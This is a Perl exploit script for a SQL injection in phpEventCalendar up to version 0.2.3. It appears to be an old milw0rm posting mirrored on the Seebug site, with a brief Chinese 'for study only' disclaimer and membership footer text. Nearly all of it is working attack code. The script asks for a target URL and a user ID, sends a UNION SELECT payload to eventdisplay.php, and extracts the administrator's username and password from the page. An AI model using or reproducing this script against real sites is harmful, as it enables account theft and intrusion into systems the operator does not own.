#!/usr/bin/perl # # Vendor url: www.ikemcg.com # require LWP::UserAgent; print "# # phpEventCalendar <= v0.2.3 SQL Injection Exploit # By Iron - ironwarez.info # Thanks to Silentz for the help :) # Greets to everyone at RootShell Security Group & dHack # # Example target url: http://www.target.com/phpeventcalendar/ Target url?"; chomp($target=<stdin>); if($target !~ /^http:\/\//) { $target = "http://".$target; } if($target !~ /\/$/) { $target .= "/"; } print "User id to retrieve name/password from? (1 = admin)"; chomp($target_id=<stdin>); $target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id; $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $response = $ua->get($target); if ($response->is_success) { if($response->content =~ /<span class="display_header">(.*)<\/span>/i) { ($username,$password) = split(/,/,$1); print "Username: ".$username; print "\nPassword: ".$password; } else { print "\nUnable to retrieve username/password."; } } else { die "Error: ".$response->status_line; } # milw0rm.com [2007-07-01]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论